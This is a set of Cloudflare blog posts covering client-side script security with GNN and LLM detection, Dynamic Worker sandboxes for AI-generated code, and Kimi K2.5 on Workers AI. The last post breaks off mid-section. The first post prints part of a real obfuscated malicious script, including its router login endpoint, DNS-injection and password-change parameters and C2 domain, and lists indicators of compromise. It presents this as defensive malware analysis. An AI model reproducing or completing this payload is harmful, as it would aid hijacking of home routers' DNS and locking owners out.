The Cloudflare Blog

Cloudflare Client-Side Security: smarter detection, now open to everyone

Zhiyuan Zheng — Mon, 30 Mar 2026 06:00:00 GMT

Client-side skimming attacks have a boring superpower: they can steal data without breaking anything. The page still loads. Checkout still completes. All it needs is just one malicious script tag.

If that sounds abstract, here are two recent examples of such skimming attacks:

In January 2026, Sansec reported a browser-side keylogger running on an employee merchandise store for a major U.S. bank, harvesting personal data, login credentials, and credit card information.
In September 2025, attackers published malicious releases of widely used npm packages. If those packages were bundled into front-end code, end users could be exposed to crypto-stealing in the browser.

To further our goal of building a better Internet, Cloudflare established a core tenet during our Birthday Week 2025: powerful security features should be accessible without requiring a sales engagement. In pursuit of this objective, we are announcing two key changes today:

First, Cloudflare Client-Side Security Advanced (formerly Page Shield add-on) is now available to self-serve customers. And second, domain-based threat intelligence is now complimentary for all customers on the free Client-Side Security bundle.

In this post, we’ll explain how this product works and highlight a new AI detection system designed to identify malicious JavaScript while minimizing false alarms. We’ll also discuss several real-world applications for these tools.

How Cloudflare Client-Side Security works

Cloudflare Client-Side Security assesses 3.5 billion scripts per day, protecting 2,200 scripts per enterprise zone on average.

Under the hood, Client-Side Security collects these signals using browser reporting (for example, Content Security Policy), which means you don’t need scanners or app instrumentation to get started, and there is zero latency impact to your web applications. The only prerequisite is that your traffic is proxied through Cloudflare.

Client-Side Security Advanced provides immediate access to powerful security features:

Smarter malicious script detection: Using in-house machine learning, this capability is now enhanced with assessments from a Large Language Model (LLM). Read more details below.
Code change monitoring: Continuous code change detection and monitoring is included, which is essential for meeting compliance like PCI DSS v4, requirement 11.6.1.
Proactive blocking rules: Benefit from positive content security rules that are maintained and enforced through continuous monitoring.

Detecting malicious intent JavaScripts

Managing client-side security is a massive data problem. For an average enterprise zone, our systems observe approximately 2,200 unique scripts; smaller business zones frequently handle around 1,000. This volume alone is difficult to manage, but the real challenge is the volatility of the code.

Roughly a third of these scripts undergo code updates within any 30-day window. If a security team attempted to manually approve every new DOM (document object model) interaction or outbound connection, the resulting overhead would paralyze the development pipeline.

Instead, our detection strategy focuses on what a script is trying to do. That includes intent classification work we’ve written about previously. In short, we analyze the script's behavior using an Abstract Syntax Tree (AST). By breaking the code down into its logical structure, we can identify patterns that signal malicious intent, regardless of how the code is obfuscated.

The high cost of false positives

Client-side security operates differently than active vulnerability scanners deployed across the web, where a Web Application Firewall (WAF) would constantly observe matched attack signatures. While a WAF constantly blocks high-volume automated attacks, a client-side compromise (such as a breach of an origin server or a third-party vendor) is a rare, high-impact event. In an enterprise environment with rigorous vendor reviews and code scanning, these attacks are rare.

This rarity creates a problem. Because real attacks are infrequent, a security system’s detections are statistically more likely to be false positives. For a security team, these false alarms create fatigue and hide real threats. To solve this, we integrated a Large Language Model (LLM) into our detection pipeline, drastically reducing the false positive rate.

Adding an LLM-based second opinion for triage

Our frontline detection engine is a Graph Neural Network (GNN). GNNs are particularly well-suited for this task: they operate on the Abstract Syntax Tree (AST) of the JavaScript code, learning structural representations that capture execution patterns regardless of variable renaming, minification, or obfuscation. In machine learning terms, the GNN learns an embedding of the code’s graph structure that generalizes across syntactic variations of the same semantic behavior.

The GNN is tuned for high recall. We want to catch novel, zero-day threats. Its precision is already remarkably high: less than 0.3% of total analyzed traffic is flagged as a false positive (FP). However, at Cloudflare’s scale of 3.5 billion scripts assessed daily, even a sub-0.3% FP rate translates to a volume of false alarms that can be disruptive to customers.

The core issue is a classic class imbalance problem. While we can collect extensive malicious samples, the sheer diversity of benign JavaScript across the web is practically infinite. Heavily obfuscated but perfectly legitimate scripts — like bot challenges, tracking pixels, ad-tech bundles, and minified framework builds — can exhibit structural patterns that overlap with malicious code in the GNN’s learned feature space. As much as we try to cover a huge variety of interesting benign cases, the model simply has not seen enough of this infinite variety during training.

This is precisely where Large Language Models (LLMs) complement the GNN. LLMs possess a deep semantic understanding of real-world JavaScript practices: they recognize domain-specific idioms, common framework patterns, and can distinguish sketchy-but-innocuous obfuscation from genuinely malicious intent.

Rather than replacing the GNN, we designed a cascading classifier architecture:

Every script is first evaluated by the GNN. If the GNN predicts the script as benign, the detection pipeline terminates immediately. This incurs only the minimal latency of the GNN for the vast majority of traffic, completely bypassing the heavier computation time of the LLM.
If the GNN flags the script as potentially malicious (above the decision threshold), the script is forwarded to an open-source LLM hosted on Cloudflare Workers AI for a second opinion.
The LLM, provided with a security-specialized prompt context, semantically evaluates the script’s intent. If it determines the script is benign, it overrides the GNN’s verdict.

This two-stage design gives us the best of both worlds: the GNN’s high recall for structural malicious patterns, combined with the LLM’s broad semantic understanding to filter out false positives.

As we previously explained, our GNN is trained on publicly accessible script URLs, the same scripts any browser would fetch. The LLM inference at runtime runs entirely within Cloudflare’s network via Workers AI using open-source models (we currently use gpt-oss-120b).

As an additional safety net, every script flagged by the GNN is logged to Cloudflare R2 for posterior analysis. This allows us to continuously audit whether the LLM’s overrides are correct and catch any edge cases where a true attack might have been inadvertently filtered out. Yes, we dogfood our own storage products for our own ML pipeline.

The results from our internal evaluations on real production traffic are compelling. Focusing on total analyzed traffic under the JS Integrity threat category, the secondary LLM validation layer reduced false positives by nearly 3x: dropping the already low ~0.3% FP rate down to ~0.1%. When evaluating unique scripts, the impact is even more dramatic: the FP rate plummets a whopping ~200x, from ~1.39% down to just 0.007%.

At our scale, cutting the overall false positive rate by two-thirds translates to millions fewer false alarms for our customers every single day. Crucially, our True Positive (actual attack) detection capability includes a fallback mechanism:as noted above, we audit the LLM’s overrides to check for possible true attacks that were filtered by the LLM.

Because the LLM acts as a highly reliable precision filter in this pipeline, we can now afford to lower the GNN’s decision threshold, making it even more aggressive. This means we catch novel, highly obfuscated True Attacks that would have previously fallen just below the detection boundary, all without overwhelming customers with false alarms. In the next phase, we plan to push this even further.

Catching zero-days in the wild: The `core.js` router exploit

This two-stage architecture is already proving its worth in the wild. Just recently, our detection pipeline flagged a novel, highly obfuscated malicious script (core.js) targeting users in specific regions.

In this case, the payload was engineered to commandeer home routers (specifically Xiaomi OpenWrt-based devices). Upon closer inspection via deobfuscation, the script demonstrated significant situational awareness: it queries the router's WAN configuration (dynamically adapting its payload using parameters like wanType=dhcp, wanType=static, and wanType=pppoe), overwrites the DNS settings to hijack traffic through Chinese public DNS servers, and even attempts to lock out the legitimate owner by silently changing the admin password. Instead of compromising a website directly, it had been injected into users' sessions via compromised browser extensions.

To evade detection, the script's core logic was heavily minified and packed using an array string obfuscator — a classic trick, but effective enough that traditional threat intelligence platforms like VirusTotal have not yet reported detections at the time of this writing.

Our GNN successfully revealed the underlying malicious structure despite the obfuscation, and the Workers AI LLM confidently confirmed the intent. Here is a glimpse of the payload showing the target router API and the attempt to inject a rogue DNS server:

const _0x1581=['bXhqw','=sSMS9WQ3RXc','cookie','qvRuU','pDhcS','WcQJy','lnqIe','oagRd','PtPlD','catch','defaultUrl','rgXPslXN','9g3KxI1b','123123123','zJvhA','content','dMoLJ','getTime','charAt','floor','wZXps','value','QBPVX','eJOgP','WElmE','OmOVF','httpOnly','split','userAgent','/?code=10&asyn=0&auth=','nonce=','dsgAq','VwEvU','==wb1kHb9g3KxI1b','cNdLa','W748oghc9TefbwK','_keyStr','parse','BMvDU','JYBSl','SoGNb','vJVMrgXPslXN','=Y2KwETdSl2b','816857iPOqmf','uexax','uYTur','LgIeF','OwlgF','VkYlw','nVRZT','110594AvIQbs','LDJfR','daPLo','pGkLa','nbWlm','responseText','20251212','EKjNN','65kNANAl','.js','94963VsBvZg','WuMYz','domain','tvSin','length','UBDtu','pfChN','1TYbnhd','charCodeAt','/cgi-bin/luci/api/xqsystem/login','http://192.168.','trace','https://api.qpft5.com','&newPwd=','mWHpj','wanType','XeEyM','YFBnm','RbRon','xI1bxI1b','fBjZQ','shift','=8yL1kHb9g3KxI1b','http://','LhGKV','AYVJu','zXrRK','status','OQjnd','response','AOBSe','eTgcy','cEKWR','&dns2=','fzdsr','filter','FQXXx','Kasen','faDeG','vYnzx','Fyuiu','379787JKBNWn','xiroy','mType','arGpo','UFKvk','tvTxu','ybLQp','EZaSC','UXETL','IRtxh','HTnda','trim','/fee','=82bv92bv92b','BGPKb','BzpiL','MYDEF','lastIndexOf','wypgk','KQMDB','INQtL','YiwmN','SYrdY','qlREc','MetQp','Wfvfh','init','/ds','HgEOZ','mfsQG','address','cDxLQ','owmLP','IuNCv','=syKxEjUS92b','then','createOffer','aCags','tJHgQ','JIoFh','setItem','ABCDEFGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789','Kwshb','ETDWH','0KcgeX92i0efbwK','stringify','295986XNqmjG','zfJMl','platform','NKhtt','onreadystatechange','88888888','push','cJVJO','XPOwd','gvhyl','ceZnn','fromCharCode',';Secure','452114LDbVEo','vXkmg','open','indexOf','UiXXo','yyUvu','ddp','jHYBZ','iNWCL','info','reverse','i4Q18Pro9TefbwK','mAPen','3960IiTopc','spOcD','dbKAM','ZzULq','bind','GBSxL','=A3QGRFZxZ2d','toUpperCase','AvQeJ','diWqV','iXtgM','lbQFd','iOS','zVowQ','jTeAP','wanType=dhcp&autoset=1&dns1=','fNKHB','nGkgt','aiEOB','dpwWd','yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW','encode','gWYAY','mckDW','createDataChannel'];
const _0x4b08=function(_0x5cc416,_0x2b0c4c){_0x5cc416=_0x5cc416-0x1d5;let _0xd00112=_0x1581[_0x5cc416];return _0xd00112;};
(function(_0x3ff841,_0x4d6f8b){const _0x45acd8=_0x4b08;while(!![]){try{const _0x1933aa=-parseInt(_0x45acd8(0x275))*-parseInt(_0x45acd8(0x264))+-parseInt(_0x45acd8(0x1ff))+parseInt(_0x45acd8(0x25d))+-parseInt(_0x45acd8(0x297))+parseInt(_0x45acd8(0x20c))+parseInt(_0x45acd8(0x26e))+-parseInt(_0x45acd8(0x219))*parseInt(_0x45acd8(0x26c));if(_0x1933aa===_0x4d6f8b)break;else _0x3ff841['push'](_0x3ff841['shift']());}catch(_0x8e5119){_0x3ff841['push'](_0x3ff841['shift']());}}}(_0x1581,0x842ab));

This is exactly the kind of sophisticated, zero-day threat that a static signature-based WAF would miss but our structural and semantic AI approach catches.

Indicators of Compromise (IOCs)

URL: hxxps://ns[.]qpft5[.]com/ads/core[.]js
SHA-256: 4f2b7d46148b786fae75ab511dc27b6a530f63669d4fe9908e5f22801dea9202
C2 Domain: hxxps://api[.]qpft5[.]com

Domain-based threat intelligence free for all

Today we are making domain-based threat intelligence available to all Cloudflare Client-Side Security customers, regardless of whether you use the Advanced offering.

In 2025, we saw many non-enterprise customers affected by client-side attacks, particularly those customers running webshops on the Magento platform. These attacks persisted for days or even weeks after they were publicized. Small and medium-sized companies often lack the enterprise-level resources and expertise needed to maintain a high security standard.

By providing domain-based threat intelligence to everyone, we give site owners a critical, direct signal of attacks affecting their users. This information allows them to take immediate action to clean up their site and investigate potential origin compromises.

To begin, simply enable Client-Side Security with a toggle in the dashboard. We will then highlight any JavaScript or connections associated with a known malicious domain.

Get started with Client-Side Security Advanced for PCI DSS v4

To learn more about Client-Side Security Advanced pricing, please visit the plans page. Before committing, we will estimate the cost based on your last month’s HTTP requests, so you know exactly what to expect.

Client-Side Security Advanced has all the tools you need to meet the requirements of PCI DSS v4 as an e-commerce merchant, particularly 6.4.3 and 11.6.1. Sign up today in the dashboard.

Sandboxing AI agents, 100x faster

Kenton Varda — Tue, 24 Mar 2026 13:00:00 GMT

Last September we introduced Code Mode, the idea that agents should perform tasks not by making tool calls, but instead by writing code that calls APIs. We've shown that simply converting an MCP server into a TypeScript API can cut token usage by 81%. We demonstrated that Code Mode can also operate behind an MCP server instead of in front of it, creating the new Cloudflare MCP server that exposes the entire Cloudflare API with just two tools and under 1,000 tokens.

But if an agent (or an MCP server) is going to execute code generated on-the-fly by AI to perform tasks, that code needs to run somewhere, and that somewhere needs to be secure. You can't just eval() AI-generated code directly in your app: a malicious user could trivially prompt the AI to inject vulnerabilities.

You need a sandbox: a place to execute code that is isolated from your application and from the rest of the world, except for the specific capabilities the code is meant to access.

Sandboxing is a hot topic in the AI industry. For this task, most people are reaching for containers. Using a Linux-based container, you can start up any sort of code execution environment you want. Cloudflare even offers our container runtime and our Sandbox SDK for this purpose.

But containers are expensive and slow to start, taking hundreds of milliseconds to boot and hundreds of megabytes of memory to run. You probably need to keep them warm to avoid delays, and you may be tempted to reuse existing containers for multiple tasks, compromising the security.

If we want to support consumer-scale agents, where every end user has an agent (or many!) and every agent writes code, containers are not enough. We need something lighter.

And we have it.

Dynamic Worker Loader: a lean sandbox

Tucked into our Code Mode post in September was the announcement of a new, experimental feature: the Dynamic Worker Loader API. This API allows a Cloudflare Worker to instantiate a new Worker, in its own sandbox, with code specified at runtime, all on the fly.

Dynamic Worker Loader is now in open beta, available to all paid Workers users.

Read the docs for full details, but here's what it looks like:

// Have your LLM generate code like this.
let agentCode: string = `
  export default {
    async myAgent(param, env, ctx) {
      // ...
    }
  }
`;

// Get RPC stubs representing APIs the agent should be able
// to access. (This can be any Workers RPC API you define.)
let chatRoomRpcStub = ...;

// Load a worker to run the code, using the worker loader
// binding.
let worker = env.LOADER.load({
  // Specify the code.
  compatibilityDate: "2026-03-01",
  mainModule: "agent.js",
  modules: { "agent.js": agentCode },

  // Give agent access to the chat room API.
  env: { CHAT_ROOM: chatRoomRpcStub },

  // Block internet access. (You can also intercept it.)
  globalOutbound: null,
});

// Call RPC methods exported by the agent code.
await worker.getEntrypoint().myAgent(param);

That's it.

100x faster

Dynamic Workers use the same underlying sandboxing mechanism that the entire Cloudflare Workers platform has been built on since its launch, eight years ago: isolates. An isolate is an instance of the V8 JavaScript execution engine, the same engine used by Google Chrome. They are how Workers work.

An isolate takes a few milliseconds to start and uses a few megabytes of memory. That's around 100x faster and 10x-100x more memory efficient than a typical container.

That means that if you want to start a new isolate for every user request, on-demand, to run one snippet of code, then throw it away, you can.

Unlimited scalability

Many container-based sandbox providers impose limits on global concurrent sandboxes and rate of sandbox creation. Dynamic Worker Loader has no such limits. It doesn't need to, because it is simply an API to the same technology that has powered our platform all along, which has always allowed Workers to seamlessly scale to millions of requests per second.

Want to handle a million requests per second, where every single request loads a separate Dynamic Worker sandbox, all running concurrently? No problem!

Zero latency

One-off Dynamic Workers usually run on the same machine — the same thread, even — as the Worker that created them. No need to communicate around the world to find a warm sandbox. Isolates are so lightweight that we can just run them wherever the request landed. Dynamic Workers are supported in every one of Cloudflare's hundreds of locations around the world.

It's all JavaScript

The only catch, vs. containers, is that your agent needs to write JavaScript.

Technically, Workers (including dynamic ones) can use Python and WebAssembly, but for small snippets of code — like that written on-demand by an agent — JavaScript will load and run much faster.

We humans tend to have strong preferences on programming languages, and while many love JavaScript, others might prefer Python, Rust, or countless others.

But we aren't talking about humans here. We're talking about AI. AI will write any language you want it to. LLMs are experts in every major language. Their training data in JavaScript is immense.

JavaScript, by its nature on the web, is designed to be sandboxed. It is the correct language for the job.

Tools defined in TypeScript

If we want our agent to be able to do anything useful, it needs to talk to external APIs. How do we tell it about the APIs it has access to?

MCP defines schemas for flat tool calls, but not programming APIs. OpenAPI offers a way to express REST APIs, but it is verbose, both in the schema itself and the code you'd have to write to call it.

For APIs exposed to JavaScript, there is a single, obvious answer: TypeScript.

Agents know TypeScript. TypeScript is designed to be concise. With very few tokens, you can give your agent a precise understanding of your API.

// Interface to interact with a chat room.
interface ChatRoom {
  // Get the last `limit` messages of the chat log.
  getHistory(limit: number): Promise;

  // Subscribe to new messages. Dispose the returned object
  // to unsubscribe.
  subscribe(callback: (msg: Message) => void): Promise;

  // Post a message to chat.
  post(text: string): Promise;
}

type Message = {
  author: string;
  time: Date;
  text: string;
}

Compare this with the equivalent OpenAPI spec (which is so long you have to scroll to see it all):

openapi: 3.1.0
info:
  title: ChatRoom API
  description: >
    Interface to interact with a chat room.
  version: 1.0.0

paths:
  /messages:
    get:
      operationId: getHistory
      summary: Get recent chat history
      description: Returns the last `limit` messages from the chat log, newest first.
      parameters:
        - name: limit
          in: query
          required: true
          schema:
            type: integer
            minimum: 1
      responses:
        "200":
          description: A list of messages.
          content:
            application/json:
              schema:
                type: array
                items:
                  $ref: "#/components/schemas/Message"

    post:
      operationId: postMessage
      summary: Post a message to the chat room
      requestBody:
        required: true
        content:
          application/json:
            schema:
              type: object
              required:
                - text
              properties:
                text:
                  type: string
      responses:
        "204":
          description: Message posted successfully.

  /messages/stream:
    get:
      operationId: subscribeMessages
      summary: Subscribe to new messages via SSE
      description: >
        Opens a Server-Sent Events stream. Each event carries a JSON-encoded
        Message object. The client unsubscribes by closing the connection.
      responses:
        "200":
          description: An SSE stream of new messages.
          content:
            text/event-stream:
              schema:
                description: >
                  Each SSE `data` field contains a JSON-encoded Message object.
                $ref: "#/components/schemas/Message"

components:
  schemas:
    Message:
      type: object
      required:
        - author
        - time
        - text
      properties:
        author:
          type: string
        time:
          type: string
          format: date-time
        text:
          type: string

We think the TypeScript API is better. It's fewer tokens and much easier to understand (for both agents and humans).

Dynamic Worker Loader makes it easy to implement a TypeScript API like this in your own Worker and then pass it in to the Dynamic Worker either as a method parameter or in the env object. The Workers Runtime will automatically set up a Cap'n Web RPC bridge between the sandbox and your harness code, so that the agent can invoke your API across the security boundary without ever realizing that it isn't using a local library.

That means your agent can write code like this:

// Thinking: The user asked me to summarize recent chat messages from Alice.
// I will filter the recent message history in code so that I only have to
// read the relevant messages.
let history = await env.CHAT_ROOM.getHistory(1000);
return history.filter(msg => msg.author == "alice");

HTTP filtering and credential injection

If you prefer to give your agents HTTP APIs, that's fully supported. Using the globalOutbound option to the worker loader API, you can register a callback to be invoked on every HTTP request, in which you can inspect the request, rewrite it, inject auth keys, respond to it directly, block it, or anything else you might like.

For example, you can use this to implement credential injection (token injection): When the agent makes an HTTP request to a service that requires authorization, you add credentials to the request on the way out. This way, the agent itself never knows the secret credentials, and therefore cannot leak them.

Using a plain HTTP interface may be desirable when an agent is talking to a well-known API that is in its training set, or when you want your agent to use a library that is built on a REST API (the library can run inside the agent's sandbox).

With that said, in the absence of a compatibility requirement, TypeScript RPC interfaces are better than HTTP:

As shown above, a TypeScript interface requires far fewer tokens to describe than an HTTP interface.
The agent can write code to call TypeScript interfaces using far fewer tokens than equivalent HTTP.
With TypeScript interfaces, since you are defining your own wrapper interface anyway, it is easier to narrow the interface to expose exactly the capabilities that you want to provide to your agent, both for simplicity and security. With HTTP, you are more likely implementing filtering of requests made against some existing API. This is hard, because your proxy must fully interpret the meaning of every API call in order to properly decide whether to allow it, and HTTP requests are complicated, with many headers and other parameters that could all be meaningful. It ends up being easier to just write a TypeScript wrapper that only implements the functions you want to allow.

Battle-hardened security

Hardening an isolate-based sandbox is tricky, as it is a more complicated attack surface than hardware virtual machines. Although all sandboxing mechanisms have bugs, security bugs in V8 are more common than security bugs in typical hypervisors. When using isolates to sandbox possibly-malicious code, it's important to have additional layers of defense-in-depth. Google Chrome, for example, implemented strict process isolation for this reason, but it is not the only possible solution.

We have nearly a decade of experience securing our isolate-based platform. Our systems automatically deploy V8 security patches to production within hours — faster than Chrome itself. Our security architecture features a custom second-layer sandbox with dynamic cordoning of tenants based on risk assessments. We've extended the V8 sandbox itself to leverage hardware features like MPK. We've teamed up with (and hired) leading researchers to develop novel defenses against Spectre. We also have systems that scan code for malicious patterns and automatically block them or apply additional layers of sandboxing. And much more.

When you use Dynamic Workers on Cloudflare, you get all of this automatically.

Helper libraries

We've built a number of libraries that you might find useful when working with Dynamic Workers:

Code Mode

@cloudflare/codemode simplifies running model-generated code against AI tools using Dynamic Workers. At its core is DynamicWorkerExecutor(), which constructs a purpose-built sandbox with code normalisation to handle common formatting errors, and direct access to a globalOutbound fetcher for controlling fetch() behaviour inside the sandbox — set it to null for full isolation, or pass a Fetcher binding to route, intercept or enrich outbound requests from the sandbox.

const executor = new DynamicWorkerExecutor({
  loader: env.LOADER,
  globalOutbound: null, // fully isolated 
});

const codemode = createCodeTool({
  tools: myTools,
  executor,
});

return generateText({
  model,
  messages,
  tools: { codemode },
});

The Code Mode SDK also provides two server-side utility functions. codeMcpServer({ server, executor }) wraps an existing MCP Server, replacing its tool surface with a single code() tool. openApiMcpServer({ spec, executor, request }) goes further: given an OpenAPI spec and an executor, it builds a complete MCP Server with search() and execute() tools as used by the Cloudflare MCP Server, and better suited to larger APIs.

In both cases, the code generated by the model runs inside Dynamic Workers, with calls to external services made over RPC bindings passed to the executor.

Learn more about the library and how to use it.

Bundling

Dynamic Workers expect pre-bundled modules. @cloudflare/worker-bundler handles that for you: give it source files and a package.json, and it resolves npm dependencies from the registry, bundles everything with esbuild, and returns the module map the Worker Loader expects.

import { createWorker } from "@cloudflare/worker-bundler";

const worker = env.LOADER.get("my-worker", async () => {
  const { mainModule, modules } = await createWorker({
    files: {
      "src/index.ts": `
        import { Hono } from 'hono';
        import { cors } from 'hono/cors';

        const app = new Hono();
        app.use('*', cors());
        app.get('/', (c) => c.text('Hello from Hono!'));
        app.get('/json', (c) => c.json({ message: 'It works!' }));

        export default app;
      `,
      "package.json": JSON.stringify({
        dependencies: { hono: "^4.0.0" }
      })
    }
  });

  return { mainModule, modules, compatibilityDate: "2026-01-01" };
});

await worker.getEntrypoint().fetch(request);

It also supports full-stack apps via createApp — bundle a server Worker, client-side JavaScript, and static assets together, with built-in asset serving that handles content types, ETags, and SPA routing.

Learn more about the library and how to use it.

File manipulation

@cloudflare/shell gives your agent a virtual filesystem inside a Dynamic Worker. Agent code calls typed methods on a state object — read, write, search, replace, diff, glob, JSON query/update, archive — with structured inputs and outputs instead of string parsing.

Storage is backed by a durable Workspace (SQLite + R2), so files persist across executions. Coarse operations like searchFiles, replaceInFiles, and planEdits minimize RPC round-trips — the agent issues one call instead of looping over individual files. Batch writes are transactional by default: if any write fails, earlier writes roll back automatically.

import { Workspace } from "@cloudflare/shell";
import { stateTools } from "@cloudflare/shell/workers";
import { DynamicWorkerExecutor, resolveProvider } from "@cloudflare/codemode";

const workspace = new Workspace({
  sql: this.ctx.storage.sql, // Works with any DO's SqlStorage, D1, or custom SQL backend
  r2: this.env.MY_BUCKET, // large files spill to R2 automatically
  name: () => this.name   // lazy — resolved when needed, not at construction
});

// Code runs in an isolated Worker sandbox with no network access
const executor = new DynamicWorkerExecutor({ loader: env.LOADER });

// The LLM writes this code; `state.*` calls dispatch back to the host via RPC
const result = await executor.execute(
  `async () => {
    // Search across all TypeScript files for a pattern
    const hits = await state.searchFiles("src/**/*.ts", "answer");
    // Plan multiple edits as a single transaction
    const plan = await state.planEdits([
      { kind: "replace", path: "/src/app.ts",
        search: "42", replacement: "43" },
      { kind: "writeJson", path: "/src/config.json",
        value: { version: 2 } }
    ]);
    // Apply atomically — rolls back on failure
    return await state.applyEditPlan(plan);
  }`,
  [resolveProvider(stateTools(workspace))]
);

The package also ships prebuilt TypeScript type declarations and a system prompt template, so you can drop the full state API into your LLM context in a handful of tokens.

Learn more about the library and how to use it.

How are people using it?

Code Mode

Developers want their agents to write and execute code against tool APIs, rather than making sequential tool calls one at a time. With Dynamic Workers, the LLM generates a single TypeScript function that chains multiple API calls together, runs it in a Dynamic Worker, and returns the final result back to the agent. As a result, only the output, and not every intermediate step, ends up in the context window. This cuts both latency and token usage, and produces better results, especially when the tool surface is large.

Our own Cloudflare MCP server is built exactly this way: it exposes the entire Cloudflare API through just two tools — search and execute — in under 1,000 tokens, because the agent writes code against a typed API instead of navigating hundreds of individual tool definitions.

Building custom automations

Developers are using Dynamic Workers to let agents build custom automations on the fly. Zite, for example, is building an app platform where users interact through a chat interface — the LLM writes TypeScript behind the scenes to build CRUD apps, connect to services like Stripe, Airtable, and Google Calendar, and run backend logic, all without the user ever seeing a line of code. Every automation runs in its own Dynamic Worker, with access to only the specific services and libraries that the endpoint needs.

“To enable server-side code for Zite’s LLM-generated apps, we needed an execution layer that was instant, isolated, and secure. Cloudflare’s Dynamic Workers hit the mark on all three, and out-performed all of the other platforms we benchmarked for speed and library support. The NodeJS compatible runtime supported all of Zite’s workflows, allowing hundreds of third party integrations, without sacrificing on startup time. Zite now services millions of execution requests daily thanks to Dynamic Workers.”
— Antony Toron, CTO and Co-Founder, Zite

Running AI-generated applications

Developers are building platforms that generate full applications from AI — either for their customers or for internal teams building prototypes. With Dynamic Workers, each app can be spun up on demand, then put back into cold storage until it's invoked again. Fast startup times make it easy to preview changes during active development. Platforms can also block or intercept any network requests the generated code makes, keeping AI-generated apps safe to run.

Pricing

Dynamically-loaded Workers are priced at $0.002 per unique Worker loaded per day (as of this post’s publication), in addition to the usual CPU time and invocation pricing of regular Workers.

For AI-generated "code mode" use cases, where every Worker is a unique one-off, this means the price is $0.002 per Worker loaded (plus CPU and invocations). This cost is typically negligible compared to the inference costs to generate the code.

During the beta period, the $0.002 charge is waived. As pricing is subject to change, please always check our Dynamic Workers pricing for the most current information.

Get Started

If you’re on the Workers Paid plan, you can start using Dynamic Workers today.

Dynamic Workers Starter

Use this “hello world” starter to get a Worker deployed that can load and execute Dynamic Workers.

Dynamic Workers Playground

You can also deploy the Dynamic Workers Playground, where you’ll be able to write or import code, bundle it at runtime with @cloudflare/worker-bundler, execute it through a Dynamic Worker, see real-time responses and execution logs.

Dynamic Workers are fast, scalable, and lightweight. Find us on Discord if you have any questions. We’d love to see what you build!

Powering the agents: Workers AI now runs large models, starting with Kimi K2.5

Michelle Chen — Thu, 19 Mar 2026 19:53:16 GMT

We're making Cloudflare the best place for building and deploying agents. But reliable agents aren't built on prompts alone; they require a robust, coordinated infrastructure of underlying primitives.

At Cloudflare, we have been building these primitives for years: Durable Objects for state persistence, Workflows for long running tasks, and Dynamic Workers or Sandbox containers for secure execution. Powerful abstractions like the Agents SDK are designed to help you build agents on top of Cloudflare’s Developer Platform.

But these primitives only provided the execution environment. The agent still needed a model capable of powering it.

Starting today, Workers AI is officially in the big models game. We now offer frontier open-source models on our AI inference platform. We’re starting by releasing Moonshot AI’s Kimi K2.5 model on Workers AI. With a full 256k context window and support for multi-turn tool calling, vision inputs, and structured outputs, the Kimi K2.5 model is excellent for all kinds of agentic tasks. By bringing a frontier-scale model directly into the Cloudflare Developer Platform, we’re making it possible to run the entire agent lifecycle on a single, unified platform.

The heart of an agent is the AI model that powers it, and that model needs to be smart, with high reasoning capabilities and a large context window. Workers AI now runs those models.

The price-performance sweet spot

We spent the last few weeks testing Kimi K2.5 as the engine for our internal development tools. Within our OpenCode environment, Cloudflare engineers use Kimi as a daily driver for agentic coding tasks. We have also integrated the model into our automated code review pipeline; you can see this in action via our public code review agent, Bonk, on Cloudflare GitHub repos. In production, the model has proven to be a fast, efficient alternative to larger proprietary models without sacrificing quality.

Serving Kimi K2.5 began as an experiment, but it quickly became critical after reviewing how the model performs and how cost-efficient it is. As an illustrative example: we have an agent that does security reviews of Cloudflare’s codebases. This agent processes over 7B tokens per day, and using Kimi, it has caught more than 15 confirmed issues in a single codebase. Doing some rough math, if we had run this agent on a mid-tier proprietary model, we would have spent $2.4M a year for this single use case, on a single codebase. Running this agent with Kimi K2.5 cost just a fraction of that: we cut costs by 77% simply by making the switch to Workers AI.

As AI adoption increases, we are seeing a fundamental shift not only in how engineering teams are operating, but how individuals are operating. It is becoming increasingly common for people to have a personal agent like OpenClaw running 24/7. The volume of inference is skyrocketing.

This new rise in personal and coding agents means that cost is no longer a secondary concern; it is the primary blocker to scaling. When every employee has multiple agents processing hundreds of thousands of tokens per hour, the math for proprietary models stops working. Enterprises will look to transition to open-source models that offer frontier-level reasoning without the proprietary price tag. Workers AI is here to facilitate this shift, providing everything from serverless endpoints for a personal agent to dedicated instances powering autonomous agents across an entire organization.

The large model inference stack

Workers AI has served models, including LLMs, since its launch two years ago, but we’ve historically prioritized smaller models. Part of the reason was that for some time, open-source LLMs fell far behind the models from frontier model labs. This changed with models like Kimi K2.5, but to serve this type of very large LLM, we had to make changes to our inference stack. We wanted to share with you some of what goes on behind the scenes to support a model like Kimi.

We’ve been working on custom kernels for Kimi K2.5 to optimize how we serve the model, which is built on top of our proprietary Infire inference engine. Custom kernels improve the model’s performance and GPU utilization, unlocking gains that would otherwise go unclaimed if you were just running the model out of the box. There are also multiple techniques and hardware configurations that can be leveraged to serve a large model. Developers typically use a combination of data, tensor, and expert parallelization techniques to optimize model performance. Strategies like disaggregated prefill are also important, in which you separate the prefill and generation stages onto different machines in order to get better throughput or higher GPU utilization. Implementing these techniques and incorporating them into the inference stack takes a lot of dedicated experience to get right.

Workers AI has already done the experimentation with serving techniques to yield excellent throughput on Kimi K2.5. A lot of this does not come out of the box when you self-host an open-source model. The benefit of using a platform like Workers AI is that you don’t need to be a Machine Learning Engineer, a DevOps expert, or a Site Reliability Engineer to do the optimizations required to host it: we’ve already done the hard part, you just need to call an API.

Beyond the model — platform improvements for agentic workloads

In concert with this launch, we’ve also improved our platform and are releasing several new features to help you build better agents.

Prefix caching and surfacing cached tokens

When you work with agents, you are likely sending a large number of input tokens as part of the context: this could be detailed system prompts, tool definitions, MCP server tools, or entire codebases. Inputs can be as large as the model context window, so in theory, you could be sending requests with almost 256k input tokens. That’s a lot of tokens.

When an LLM processes a request, the request is broken down into two stages: the prefill stage processes input tokens and the output stage generates output tokens. These stages are usually sequential, where input tokens have to be fully processed before you can generate output tokens. This means that sometimes the GPU is not fully utilized while the model is doing prefill.

